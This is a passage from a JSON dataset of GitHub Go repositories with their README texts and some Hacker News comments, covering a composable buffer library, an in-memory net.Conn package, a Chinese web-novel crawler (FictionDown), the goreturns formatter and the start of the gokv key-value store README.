test](https://github.com/djherbis/buffer/actions/workflows/go-test.yml/badge.svg)](https://github.com/djherbis/buffer/actions/workflows/go-test.yml)\n[![Coverage Status](https://coveralls.io/repos/djherbis/buffer/badge.svg?branch=master)](https://coveralls.io/r/djherbis/buffer?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/djherbis/buffer)](https://goreportcard.com/report/github.com/djherbis/buffer)\n\nUsage\n------------\n\nThe following buffers provide simple unique behaviours which when composed can create complex buffering strategies. For use with github.com/djherbis/nio for Buffered io.Pipe and io.Copy implementations.\n\nFor example: \n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n \"github.com/djherbis/nio\"\n \n \"io/ioutil\"\n)\n\n// Buffer 32KB to Memory, after that buffer to 100MB chunked files\nbuf := buffer.NewUnboundedBuffer(32*1024, 100*1024*1024)\nnio.Copy(w, r, buf) // Reads from r, writes to buf, reads from buf writes to w (concurrently).\n\n// Buffer 32KB to Memory, discard overflow\nbuf = buffer.NewSpill(32*1024, ioutil.Discard)\nnio.Copy(w, r, buf)\n```\n\nSupported Buffers\n------------\n\n#### Bounded Buffers ####\n\nMemory: Wrapper for bytes.Buffer\n\nFile: File-based buffering. The file never exceeds Cap() in length, no matter how many times its written/read from. It accomplishes this by \"wrapping\" around the fixed max-length file when the data gets too long but there is available freed space at the beginning of the file. The caller is responsible for closing and deleting the file when done.\n\n```go\nimport (\n \"ioutil\"\n \"os\"\n \n \"github.com/djherbis/buffer\"\n)\n\n// Create a File-based Buffer with max size 100MB\nfile, err := ioutil.TempFile(\"\", \"buffer\")\nif err != nil {\n\treturn err\n}\ndefer os.Remove(file.Name())\ndefer file.Close()\n\nbuf := buffer.NewFile(100*1024*1024, file)\n\n// A simpler way:\npool := buffer.NewFilePool(100*1024*1024, \"\") // \"\" -- use temp dir\nbuf, err := pool.Get() // allocate the buffer\nif err != nil {\n return err\n}\ndefer pool.Put(buf) // close and remove the allocated file for the buffer\n\n```\n\nMulti: A fixed length linked-list of buffers. Each buffer reads from the next buffer so that all the buffered data is shifted upwards in the list when reading. Writes are always written to the first buffer in the list whose Len() < Cap().\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\nmem := buffer.New(32*1024)\nfile := buffer.NewFile(100*1024*1024, someFileObj)) // you'll need to manage Open(), Close() and Delete someFileObj\n\n// Buffer composed of 32KB of memory, and 100MB of file.\nbuf := buffer.NewMulti(mem, file)\n```\n\n#### Unbounded Buffers ####\n\nPartition: A queue of buffers. Writes always go to the last buffer in the queue. If all buffers are full, a new buffer is \"pushed\" to the end of the queue (generated by a user-given function). Reads come from the first buffer, when the first buffer is emptied it is \"popped\" off the queue.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\n// Create 32 KB sized-chunks of memory as needed to expand/contract the buffer size.\nbuf := buffer.NewPartition(buffer.NewMemPool(32*1024))\n\n// Create 100 MB sized-chunks of files as needed to expand/contract the buffer size.\nbuf = buffer.NewPartition(buffer.NewFilePool(100*1024*1024, \"\"))\n```\n\nRing: A single buffer which begins overwriting the oldest buffered data when it reaches its capacity.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\n// Create a File-based Buffer with max size 100MB\nfile := buffer.NewFile(100*1024*1024, someFileObj) // you'll need to Open(), Close() and Delete someFileObj.\n\n// If buffered data exceeds 100MB, overwrite oldest data as new data comes in\nbuf := buffer.NewRing(file) // requires BufferAt interface.\n```\n\nSpill: A single buffer which when full, writes the overflow to a given io.Writer.\n-> Note that it will actually \"spill\" whenever there is an error while writing, this should only be a \"full\" error.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n \"github.com/djherbis/nio\"\n \n \"io/ioutil\"\n)\n\n// Buffer 32KB to Memory, discard overflow\nbuf := buffer.NewSpill(32*1024, ioutil.Discard)\nnio.Copy(w, r, buf)\n```\n\n#### Empty Buffer ####\n\nDiscard: Reads always return EOF, writes goto ioutil.Discard.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\n// Reads will return io.EOF, writes will return success (nil error, full write) but no data was written.\nbuf := buffer.Discard\n```\n\nCustom Buffers\n------------\n\nFeel free to implement your own buffer, just meet the required interface (Buffer/BufferAt) and compose away!\n\n```go\n\n// Buffer Interface used by Multi and Partition\ntype Buffer interface {\n\tLen() int64\n\tCap() int64\n\tio.Reader\n\tio.Writer\n\tReset()\n}\n\n// BufferAt interface used by Ring\ntype BufferAt interface {\n\tBuffer\n\tio.ReaderAt\n\tio.WriterAt\n}\n\n```\n\nInstallation\n------------\n```sh\ngo get github.com/djherbis/buffer\n```\n", "readme_type": "markdown", "hn_comments": "Hey author here, happy to answer your questions.Nice work. buffer.NewPool is a great convenience over writing your own sync.Pool.I was previously using https://github.com/oxtoacart/bpool as a 64K buffer pool for rendering (concurrently) template/html contents\u2014so I can check for the errors from template.Render\u2014before then using io.Copy to copy the \"known good\" contents to the http.ResponseWriter. I may have to look into using this.As a relative go newb, I do have a question about this: I thought channels/go routines were already essentially composable buffers. No? // Buffer 32KB to Memory, after that buffer to 100MB chunked files\n buf := buffer.NewUnboundedBuffer(32*1024, 100*1024*1024)\n\n pool := NewFilePool(100*1024*1024, \"\") // \"\" -- use temp dir\n\nI seem to have a twofold feeling about this code: on one hand I really like the brevity of these statements, but on the other hand it does come at the cost of being rather cryptic: without the comments one can only guess what exactly is going on. To the point that should I want to use this in my own code and make it understandable I'd almost would be forced to either copy the comments as well or else wrap it in a method with another name or. In such cases it probably would have been better if the original API already had done this.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "akutz/memconn", "link": "https://github.com/akutz/memconn", "tags": [], "stars": 518, "description": "MemConn is an in-memory network stack for Go.", "lang": "Go", "repo_lang": "", "readme": "# MemConn [![GoDoc](https://godoc.org/github.com/akutz/memconn?status.svg)](http://godoc.org/github.com/akutz/memconn) [![Build Status](http://travis-ci.org/akutz/memconn.svg?branch=master)](https://travis-ci.org/akutz/memconn) [![Go Report Card](http://goreportcard.com/badge/akutz/memconn)](http://goreportcard.com/report/akutz/memconn)\nMemConn provides named, in-memory network connections for Go.\n\n## Create a Server\nA new `net.Listener` used to serve HTTP, gRPC, etc. is created with\n`memconn.Listen`:\n\n```go\nlis, err := memconn.Listen(\"memu\", \"UniqueName\")\n```\n\n## Creating a Client (Dial)\nClients can dial any named connection:\n\n```go\nclient, err := memconn.Dial(\"memu\", \"UniqueName\")\n```\n\n## Network Types\nMemCon supports the following network types:\n\n| Network | Description |\n|---------|-------------|\n| `memb` | A buffered, in-memory implementation of `net.Conn` |\n| `memu` | An unbuffered, in-memory implementation of `net.Conn` |\n\n## Performance\nThe benchmark results illustrate MemConn's performance versus TCP\nand UNIX domain sockets:\n\n![ops](https://imgur.com/o8mXla6.png \"Ops (Larger is Better)\")\n![ns/op](https://imgur.com/8YvPmMU.png \"Nanoseconds/Op (Smaller is Better)\")\n![B/op](https://imgur.com/vQSfIR2.png \"Bytes/Op (Smaller is Better)\")\n![allocs/op](https://imgur.com/k263257.png \"Allocs/Op (Smaller is Better)\")\n\nMemConn is more performant than TCP and UNIX domain sockets with respect\nto the CPU. While MemConn does allocate more memory, this is to be expected\nsince MemConn is an in-memory implementation of the `net.Conn` interface.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ma6254/FictionDown", "link": "https://github.com/ma6254/FictionDown", "tags": ["biquge", "qidian", "fiction", "novels", "spider", "crawler", "golang"], "stars": 517, "description": "\u5c0f\u8bf4\u4e0b\u8f7d|\u5c0f\u8bf4\u722c\u53d6|\u8d77\u70b9|\u7b14\u8da3\u9601|\u5bfc\u51faMarkdown|\u5bfc\u51fatxt|\u8f6c\u6362epub|\u5e7f\u544a\u8fc7\u6ee4|\u81ea\u52a8\u6821\u5bf9", "lang": "Go", "repo_lang": "", "readme": "# FictionDown\n\nFictionDown \u662f\u4e00\u4e2a\u547d\u4ee4\u884c\u754c\u9762\u7684\u5c0f\u8bf4\u722c\u53d6\u5de5\u5177\n\n**\u7528\u4e8e\u6279\u91cf\u4e0b\u8f7d\u76d7\u7248\u7f51\u7edc\u5c0f\u8bf4\uff0c\u8be5\u8f6f\u4ef6\u4ec5\u7528\u4e8e\u6570\u636e\u5206\u6790\u7684\u6837\u672c\u91c7\u96c6\uff0c\u8bf7\u52ff\u7528\u4e8e\u5176\u4ed6\u7528\u9014**\n\n**\u8be5\u8f6f\u4ef6\u6240\u4ea7\u751f\u7684\u6587\u6863\u8bf7\u52ff\u4f20\u64ad\uff0c\u8bf7\u52ff\u7528\u4e8e\u6570\u636e\u8bc4\u4f30\u5916\u7684\u5176\u4ed6\u7528\u9014**\n\n[![License](https://img.shields.io/github/license/ma6254/FictionDown.svg)](https://raw.githubusercontent.com/ma6254/FictionDown/master/LICENSE)\n[![release_version](https://img.shields.io/github/release/ma6254/FictionDown.svg)](https://github.com/ma6254/FictionDown/releases)\n[![last-commit](https://img.shields.io/github/last-commit/ma6254/FictionDown.svg)](https://github.com/ma6254/FictionDown/commits)\n[![Download Count](https://img.shields.io/github/downloads/ma6254/FictionDown/total.svg)](https://github.com/ma6254/FictionDown/releases)\n[![goproxy.cn](https://goproxy.cn/stats/github.com/ma6254/FictionDown/badges/download-count.svg)](https://goproxy.cn)\n\n[![godoc](https://img.shields.io/badge/godoc-reference-blue.svg)](https://pkg.go.dev/github.com/ma6254/FictionDown/)\n[![QQ \u7fa4](https://img.shields.io/badge/qq%E7%BE%A4-934873832-orange.svg)](https://jq.qq.com/?_wv=1027&k=5bN0SVA)\n\n[![Go](https://github.com/ma6254/FictionDown/workflows/Go/badge.svg)](https://github.com/ma6254/FictionDown/actions/runs/39839114)\n[![travis-ci](https://www.travis-ci.org/ma6254/FictionDown.svg?branch=master)](https://travis-ci.org/ma6254/FictionDown)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ma6254/FictionDown)](https://goreportcard.com/report/github.com/ma6254/FictionDown)\n\n## \u6587\u6863\n\n\u6587\u6863\u76ee\u524d\u300c\u6307\u5357\u300d\u90e8\u5206\u5df2\u5b8c\u6210\uff0c\u4f60\u53ef\u4ee5\u5728[\u8fd9\u91cc](https://ma6254.github.io/FictionDown/)\u67e5\u770b\u3002\n\n## \u7279\u6027\n\n- \u4ee5\u8d77\u70b9\u4e3a\u6837\u672c\uff0c\u591a\u7ad9\u70b9\u591a\u7ebf\u7a0b\u722c\u53d6\u6821\u5bf9\n- \u652f\u6301\u5bfc\u51fa txt\uff0c\u4ee5\u517c\u5bb9\u5927\u591a\u6570\u9605\u8bfb\u5668\n- \u652f\u6301\u5bfc\u51fa epub(\u8fd8\u6709\u4e9b\u95ee\u9898\uff0c\u67d0\u4e9b\u9605\u8bfb\u5668\u65e0\u6cd5\u6253\u5f00)\n- \u652f\u6301\u5bfc\u51fa markdown\uff0c\u53ef\u4ee5\u7528 pandoc \u8f6c\u6362\u6210 epub\uff0c\u9644\u5e26 epub \u7684`metadata`\uff0c\u4fdd\u7559\u4e66\u672c\u4fe1\u606f\u3001\u5377\u7ed3\u6784\u3001\u4f5c\u8005\u4fe1\u606f\n- \u5185\u7f6e\u7b80\u5355\u7684\u5e7f\u544a\u8fc7\u6ee4\uff08\u73b0\u5728\u8fd8\u4e0d\u5b8c\u5584\uff09\n- \u7528 Golang \u7f16\u5199\uff0c\u5b89\u88c5\u90e8\u7f72\u65b9\u4fbf\uff0c\u53ef\u9009\u7684\u5916\u90e8\u4f9d\u8d56\uff1aChromedp\n- \u652f\u6301\u65ad\u70b9\u7eed\u722c\uff0c\u5f3a\u5236\u7ed3\u675f\u518d\u722c\u4f1a\u5728\u4e0a\u6b21\u7ed3\u675f\u7684\u5730\u65b9\u7ee7\u7eed\n\n## \u7ad9\u70b9\u652f\u6301\n\n- \u662f\u5426\u6b63\u7248\uff1a\u2705 \u4e3a\u6b63\u7248\u7ad9\u70b9 \u274c \u4e3a\u76d7\u7248\u7ad9\u70b9\n- \u662f\u5426\u5206\u5377\uff1a\u2705 \u7ae0\u8282\u5206\u5377 \u274c \u6240\u6709\u7ae0\u8282\u653e\u5728\u4e00\u4e2a\u5377\u4e2d\u4e0d\u5206\u5377\n- \u7ad9\u5185\u641c\u7d22\uff1a\u2705 \u5b8c\u5168\u652f\u6301 \u274c \u4e0d\u652f\u6301 \u2754 \u7ad9\u70b9\u652f\u6301\u4f46\u8f6f\u4ef6\u672a\u9002\u914d \u26a0\ufe0f \u7ad9\u70b9\u652f\u6301\uff0c\u4f46\u4e0d\u53ef\u7528\u6216\u7ef4\u62a4\u4e2d \u26d4 \u7ad9\u70b9\u652f\u6301\u641c\u7d22\uff0c\u4f46\u6ca1\u6709\u597d\u7684\u9002\u914d\u65b9\u6848\uff08\u6bd4\u5982\u7528 Google \u505a\u7ad9\u5185\u641c\u7d22\uff09\n\n| \u7ad9\u70b9\u540d\u79f0 | \u7f51\u5740 | \u662f\u5426\u6b63\u7248 | \u662f\u5426\u5206\u5377 | \u652f\u6301\u7ad9\u5185\u641c\u7d22 | \u4ee3\u7801\u6587\u4ef6 |\n| ------------ | ----------------- | -------- | -------- | ------------ | ------------------------------ |\n| \u8d77\u70b9\u4e2d\u6587\u7f51 | www.qidian.com | \u2705 | \u2705 | \u2705 | sites\\com_qidian\\main.go |\n| \u7b14\u8da3\u9601 | www.b520.cc | \u274c | \u274c | \u2705 | sites\\cc_b520\\main.go |\n| \u9876\u70b9\u5c0f\u8bf4 | www.ddyueshu.com | \u274c | \u274c | \u2705 | sites\\com_ddyueshu\\main.go |\n| \u5168\u672c\u5c0f\u8bf4\u7f51 | www.qb5.la | \u274c | \u274c | \u2705 | sites\\la_qb5\\main.go |\n| \u65b0\u516b\u4e00\u4e2d\u6587\u7f51 | www.81new.net | \u274c | \u274c | \u2705 | sites\\net_new81\\main.go |\n| \u4e66\u8ff7\u697c | www.shumil.co | \u274c | \u274c | \u2705 | sites\\co_shumil\\main.go |\n| \u5b8c\u672c\u795e\u7ad9 | www.wanben.org | \u274c | \u274c | \u2705 | site\\org_wanben\\main.go |\n| 38 \u770b\u4e66 | www.mijiashe.com | \u274c | \u274c | \u26a0\ufe0f | sites\\com_mijiashe\\main.go |\n\n## \u4f7f\u7528\u6ce8\u610f\n\n- \u8d77\u70b9\u548c\u76d7\u7248\u7ad9\u7684\u9875\u9762\u53ef\u80fd\u968f\u65f6\u66f4\u6539\uff0c\u53ef\u80fd\u4f1a\u4f7f\u6293\u53d6\u5339\u914d\u5931\u6548\uff0c\u5982\u679c\u5931\u6548\u8bf7\u63d0 issue\n- \u751f\u6210\u7684 EPUB \u6587\u4ef6\u53ef\u80fd\u8fc7\u5927\uff0c\u5e02\u9762\u4e0a\u5927\u591a\u6570\u9605\u8bfb\u5668\u4f1a\u5f02\u5e38\u5361\u987f\u6216\u8005\u76f4\u63a5\u5d29\u6e83\n- \u67d0\u4e9b\u8fc7\u4e8e\u8001\u7684\u4e66\u6216\u8005\u4f5c\u8005\u9891\u7e41\u4fee\u6539\u7684\u4e66\uff0c\u76d7\u7248\u7ad9\u90fd\u6ca1\u6709\u6536\u5f55\uff0c\u4e5f\u5c31\u65e0\u6cd5\u722c\u53d6\uff0c\u5982\u80fd\u627e\u6b64\u4e66\u53ef\u7528\u7684\u76d7\u7248\u7ad9\u8bf7\u63d0 issue\uff0c\u5e76\u5199\u51fa\u4e66\u540d\u548c\u6b63\u7248\u7ad9\u94fe\u63a5\u3001\u76d7\u7248\u7ad9\u94fe\u63a5\n\n## \u5de5\u4f5c\u6d41\u7a0b\n\n1. \u8f93\u5165\u8d77\u70b9\u94fe\u63a5\n2. \u83b7\u53d6\u5230\u4e66\u672c\u4fe1\u606f\uff0c\u5f00\u59cb\u722c\u53d6\u6bcf\u7ae0\u5185\u5bb9\uff0c\u9047\u5230 vip \u7ae0\u8282\u653e\u5165`Example`\u4e2d\u4f5c\u4e3a\u6821\u5bf9\u6837\u672c\n3. \u624b\u52a8\u8bbe\u7f6e\u7b14\u8da3\u9601\u7b49\u76d7\u7248\u5c0f\u8bf4\u7684\u5bf9\u5e94\u94fe\u63a5\uff0c`tamp`\u5b57\u6bb5\n4. \u518d\u6b21\u542f\u52a8\uff0c\u5f00\u59cb\u722c\u53d6\uff0c\u53ea\u722c\u53d6 VIP \u90e8\u5206\uff0c\u5e76\u8ddf`Example`\u8fdb\u884c\u6821\u5bf9\n5. \u624b\u52a8\u7f16\u8f91\u5bf9\u5e94\u7684\u7f13\u5b58\u6587\u4ef6\uff0c\u624b\u52a8\u5220\u9664\u5e7f\u544a\u548c\u67d0\u4e9b\u968f\u673a\u5b57\u7b26(\u6709\u90e8\u5206\u662f\u5173\u952e\u5b57,\u53ef\u80fd\u4f1a\u5bfc\u81f4 pandoc \u5185\u5b58\u6ea2\u51fa\u6216\u8005\u6837\u5f0f\u9519\u8bef)\n6. `conv -f md`\u751f\u6210 markwown\n7. \u7528 pandoc \u8f6c\u6362\u6210 epub\uff0c`pandoc -o xxxx.epub xxxx.md`\n\n### Example\n\n```bash\n> ./FictionDown --url https://book.qidian.com/info/3249362 d # \u83b7\u53d6\u6b63\u7248\u4fe1\u606f\n\n# \u6709\u65f6\u4f1a\u53d1\u751f`not match volumes`\u7684\u9519\u8bef\uff0c\u8bf7\u542f\u7528Chromedp\u6216\u8005PhantomJS\n# Use Chromedp\n> ./FictionDown --url https://book.qidian.com/info/3249362 -d chromedp d\n# Use PhantomJS\n> ./FictionDown --url https://book.qidian.com/info/3249362 -d phantomjs d\n\n> vim \u4e00\u4e16\u4e4b\u5c0a.FictionDown # \u52a0\u5165\u76d7\u7248\u5c0f\u8bf4\u94fe\u63a5\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown d # \u83b7\u53d6\u76d7\u7248\u5185\u5bb9\n# \u722c\u53d6\u5b8c\u6bd5\u5c31\u53ef\u4ee5\u8f93\u51fa\u53ef\u9605\u8bfb\u7684\u6587\u6863\u4e86\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f txt\n# \u8f6c\u6362\u6210epub\u6709\u4e24\u79cd\u65b9\u5f0f\n# 1.\u8f93\u51famarkdown\uff0c\u518d\u7528pandoc\u8f6c\u6362\u6210epub\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f md\n> pandoc -o \u4e00\u4e16\u4e4b\u5c0a.epub \u4e00\u4e16\u4e4b\u5c0a.md\n# \u67d0\u4e9b\u9605\u8bfb\u5668\u9700\u8981\u5bf9\u7ae0\u8282\u8fdb\u884c\u5b9a\u4f4d,\u9700\u8981\u52a0\u4e0a--epub-chapter-level=2\n> pandoc -o \u4e00\u4e16\u4e4b\u5c0a.epub --epub-chapter-level=2 \u4e00\u4e16\u4e4b\u5c0a.md\n# 2.\u76f4\u63a5\u8f93\u51faepub\uff08\u8c03\u7528Pandoc\uff09\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f epub\n```\n\n#### \u53ef\u76f4\u63a5\u6839\u636e\u641c\u7d22\u7ed3\u679c\u76f4\u63a5\u4e0b\u8f7d\uff08\u5f53\u5b58\u5728\u81f3\u5c11\u4e00\u4e2a\u6b63\u7248\u6e90\u65f6\u53ef\u7528\uff09\n\n```bash\n> ./FictionDown s -d -k \"\u8be1\u79d8\u4e4b\u4e3b\"\n```\n\n#### \u7ad9\u5185\u641c\u7d22\uff0c\u7136\u540e\u586b\u5165\n\n```bash\n> ./FictionDown --url https://book.qidian.com/info/3249362 d # \u83b7\u53d6\u6b63\u7248\u4fe1\u606f\n\n# \u6709\u65f6\u4f1a\u53d1\u751f`not match volumes`\u7684\u9519\u8bef\uff0c\u8bf7\u542f\u7528Chromedp\u6216\u8005PhantomJS\n# Use Chromedp\n> ./FictionDown --url https://book.qidian.com/info/3249362 --driver chromedp d\n# Use PhantomJS\n> ./FictionDown --url https://book.qidian.com/info/3249362 --driver phantomjs d\n\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown s -k \u4e00\u4e16\u4e4b\u5c0a -p # \u641c\u7d22\u7136\u540e\u653e\u5165\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown d # \u83b7\u53d6\u76d7\u7248\u5185\u5bb9\n# \u722c\u53d6\u5b8c\u6bd5\u5c31\u53ef\u4ee5\u8f93\u51fa\u53ef\u9605\u8bfb\u7684\u6587\u6863\u4e86\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f txt\n# \u8f6c\u6362\u6210epub\u6709\u4e24\u79cd\u65b9\u5f0f\n# 1.\u8f93\u51famarkdown\uff0c\u518d\u7528pandoc\u8f6c\u6362\u6210epub\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f md\n> pandoc -o \u4e00\u4e16\u4e4b\u5c0a.epub \u4e00\u4e16\u4e4b\u5c0a.md\n# 2.\u76f4\u63a5\u8f93\u51faepub\uff08\u67d0\u4e9b\u9605\u8bfb\u5668\u4f1a\u62a5\u9519\uff09\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f epub\n```\n\n## \u672a\u5b9e\u73b0\n\n- \u722c\u53d6\u6b63\u7248\u7684\u65f6\u5019\u5e26\u4e0a`Cookie`\uff0c\u7528\u4e8e\u722c\u53d6\u5df2\u8d2d\u4e70\u7ae0\u8282\n- \u652f\u6301 \u664b\u6c5f\u6587\u5b66\u57ce\n- \u652f\u6301 \u7eb5\u6a2a\u4e2d\u6587\u7f51\n- \u652f\u6301\u6709\u6bd2\u5c0f\u8bf4\u7f51\n- \u652f\u6301\u523a\u732c\u732b\uff08\u5373\u201c\u6b22\u4e50\u4e66\u5ba2\u201d\uff09\n- \u6574\u7406 main \u5305\u4e2d\u7684\u9762\u6761\u903b\u8f91\n- \u6574\u7406\u547d\u4ee4\u884c\u53c2\u6570\u98ce\u683c\n- \u5b8c\u5584\u5e7f\u544a\u8fc7\u6ee4\n- \u7b80\u5316\u4f7f\u7528\u6b65\u9aa4\n- \u4f18\u5316 log \u8f93\u51fa\n- \u5bf9\u4e8e\u7279\u6b8a\u7ae0\u8282\uff0c\u652f\u6301\u624b\u52a8\u6307\u5b9a\u76d7\u7248\u94fe\u63a5\u6216\u8005\u8df3\u8fc7\u5ffd\u7565\n- \u5916\u90e8\u52a0\u8f7d\u5339\u914d\u89c4\u5219\uff0c\u8ba9\u7528\u6237\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u6b63/\u76d7\u7248\u6e90\n- \u652f\u6301\u7ae0\u8282\u66f4\u65b0\n- \u7ae0\u8282\u5339\u914d\u8fc7\u7a0b\u4f18\u5316\n\n## Usage\n\n```bash\nNAME:\n FictionDown - https://github.com/ma6254/FictionDown\n\nUSAGE:\n [global options] command [command options] [arguments...]\n\nAUTHOR:\n ma6254 <9a6c5609806a@gmail.com>\n\nCOMMANDS:\n download, d, down \u4e0b\u8f7d\u7f13\u5b58\u6587\u4ef6\n check, c, chk \u68c0\u67e5\u7f13\u5b58\u6587\u4ef6\n edit, e \u5bf9\u7f13\u5b58\u6587\u4ef6\u8fdb\u884c\u624b\u52a8\u4fee\u6539\n convert, conv \u8f6c\u6362\u683c\u5f0f\u8f93\u51fa\n pirate, p \u68c0\u7d22\u76d7\u7248\u7ad9\u70b9\n search, s \u68c0\u7d22\u76d7\u7248\u7ad9\u70b9\n help, h Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n -u value, --url value \u56fe\u4e66\u94fe\u63a5\n --tu value, --turl value \u8d44\u6e90\u7f51\u7ad9\u94fe\u63a5\n -i value, --input value \u8f93\u5165\u7f13\u5b58\u6587\u4ef6\n --log value log file path\n --driver value, -d value \u8bf7\u6c42\u65b9\u5f0f,support: none,phantomjs,chromedp\n --help, -h show help\n --version, -v print the version\n```\n\n## \u5b89\u88c5\u548c\u7f16\u8bd1\n\n\u7a0b\u5e8f\u4e3a\u5355\u6267\u884c\u6587\u4ef6\uff0c\u547d\u4ee4\u884c CLI \u754c\u9762\n\n\u5305\u7ba1\u7406\u4e3a gomod\n\n```bash\ngo get github.com/ma6254/FictionDown\n```\n\n\u4ea4\u53c9\u7f16\u8bd1\u8fd9\u51e0\u4e2a\u5e73\u53f0\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff1a`linux/arm` `linux/amd64` `darwin/amd64` `windows/amd64`\n\n```bash\nmake multiple_build\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sqs/goreturns", "link": "https://github.com/sqs/goreturns", "tags": [], "stars": 517, "description": "A gofmt/goimports-like tool for Go programmers that fills in Go return statements with zero values to match the func return types", "lang": "Go", "repo_lang": "", "readme": "This tool adds zero-value return values to incomplete Go return\nstatements, to save you time when writing Go. It is inspired by\nand based on goimports.\n\n![short screencast](screencast.gif)\n\nfull 30-second screencast: http://youtu.be/hyEMO9vtKZ8\n\nFor example, the following incomplete return statement:\n\n\tfunc F() (*MyType, int, error) { return errors.New(\"foo\") }\n\nis made complete by adding nil and 0 returns (the zero values for\n*MyType and int):\n\n\tfunc F() (*MyType, int, error) { return nil, 0, errors.New(\"foo\") }\n\nTo install:\n\n\tgo get -u github.com/sqs/goreturns\n\nTo run:\n\n\tgoreturns file.go\n\nTo view a diff showing what it'd do on a sample file:\n\n\tgoreturns -d $GOPATH/github.com/sqs/goreturns/_sample/a.go\n\nEditor integration: replace gofmt or goimports in your post-save hook\nwith goreturns. By default goreturns calls goimports on files before\nperforming its own processing.\n\nIt acts the same as gofmt (same flags, etc) but in addition to code\nformatting, also fixes returns.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "philippgille/gokv", "link": "https://github.com/philippgille/gokv", "tags": ["go", "golang", "key-value", "key-value-store", "library", "package", "abstraction", "simple", "redis", "bolt", "boltdb", "consul", "badgerdb", "database", "etcd", "dynamodb", "mongodb", "memcached", "cloud-storage", "postgresql"], "stars": 517, "description": "Simple key-value store abstraction and implementations for Go (Redis, Consul, etcd, bbolt, BadgerDB, LevelDB, Memcached, DynamoDB, S3, PostgreSQL, MongoDB, CockroachDB and many more)", "lang": "Go", "repo_lang": "", "readme": "gokv\n====\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/philippgille/gokv.svg)](https://pkg.go.dev/github.com/philippgille/gokv)\n[![Build status](https://github.com/philippgille/gokv/actions/workflows/test.yml/badge.svg)](https://github.com/philippgille/gokv/actions/workflows/test.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/philippgille/gokv)](https://goreportcard.com/report/github.com/philippgille/gokv)\n[![codecov](https://codecov.io/gh/philippgille/gokv/branch/master/graph/badge.svg)](https://codecov.io/gh/philippgille/gokv)\n[![GitHub Releases](https://img.shields.io/github/release/philippgille/gokv.svg)](https://github.com/philippgille/gokv/releases)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n\nSimple key-value store abstraction and implementations for Go\n\nContents\n--------\n\n1. [Features](#features)\n 1. [Simple interface](#simple-interface)\n 2. [Implementations](#implementations)\n 3. [Value types](#value-types)\n 4. [Marshal formats](#marshal-formats)\n 5. [Roadmap](#roadmap)\n2. [Usage](#usage)\n3. [Project status](#project-status)\n4. [Motivation](#motivation)\n5. [Design decisions](#design-decisions)\n6. [Related projects](#related-projects)\n7. [License](#license)\n\nFeatures\n--------\n\n### Simple interface\n\n> Note: The interface is not final yet! See [Project status](#project-status) for details.\n\n```go\ntype Store interface {\n Set(k string, v interface{}) error\n Get(k string, v interface{}) (found bool, err error)\n Delete(k string) error\n Close() error\n}\n```\n\nThere are detailed descriptions of the methods in the [docs](https://pkg.go.dev/badge/github.com/philippgille/gokv#Store) and in the [code](https://github.com/philippgille/gokv/blob/master/store.go). You should read them if you plan to write your own `gokv.Store` implementation or if you create a Go package with a method that takes a `gokv.Store` as parameter, so you know exactly what happens in the background.\n\n### Implementations\n\nSome of the following databases aren't specifically engineered for storing key-value pairs, but if someone's running them already for other purposes and doesn't want to set up one of the proper key-value stores due to administrative overhead etc., they can of course be used as well. In those cases let's focus on a few of the most popular though. This mostly goes for the SQL, NoSQL and NewSQL categories.\n\nFeel free to suggest more stores by creating an [issue](https://github.com/philippgille/gokv/issues) or even add an actual implementation - [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](http://makeapullrequest.com).\n\nFor differences between the implementations, see [Choosing an implementation](docs/choosing-implementation.md). \nFor the Godoc of specific implementations, see .\n\n- Local in-memory\n - [X] Go `sync.Map`\n - [X] Go `map` (with `sync.RWMutex`)\n - [X] [FreeCache](https://github.com/coocood/freecache)\n - [X] [BigCache](https://github.com/allegro/bigcache)\n- Embedded\n - [X] [bbolt](https://github.com/etcd-io/bbolt) (formerly known as [Bolt / Bolt DB](https://github.com/boltdb/bolt))\n - [X] [BadgerDB](https://github.com/dgraph-io/badger)\n - [X] [LevelDB / goleveldb](https://github.com/syndtr/goleveldb)\n - [X] Local files (one file per key-value pair, with the key being the filename and the value being the file content)\n- Distributed store\n - [X] [Redis](https://github.com/antirez/redis)\n - [X] [Consul](https://github.com/hashicorp/consul)\n - [X] [etcd](https://github.com/etcd-io/etcd)\n - [X] [Apache ZooKeeper](https://github.com/apache/zookeeper)\n - [ ] [TiKV](https://github.com/tikv/tikv)\n- Distributed cache (no presistence *by default*)\n - [X] [Memcached](https://github.com/memcached/memcached)\n - [X] [Hazelcast](https://github.com/hazelcast/hazelcast)\n- Cloud\n - [X] [Amazon DynamoDB](https://aws.amazon.com/dynamodb/)\n - [X] 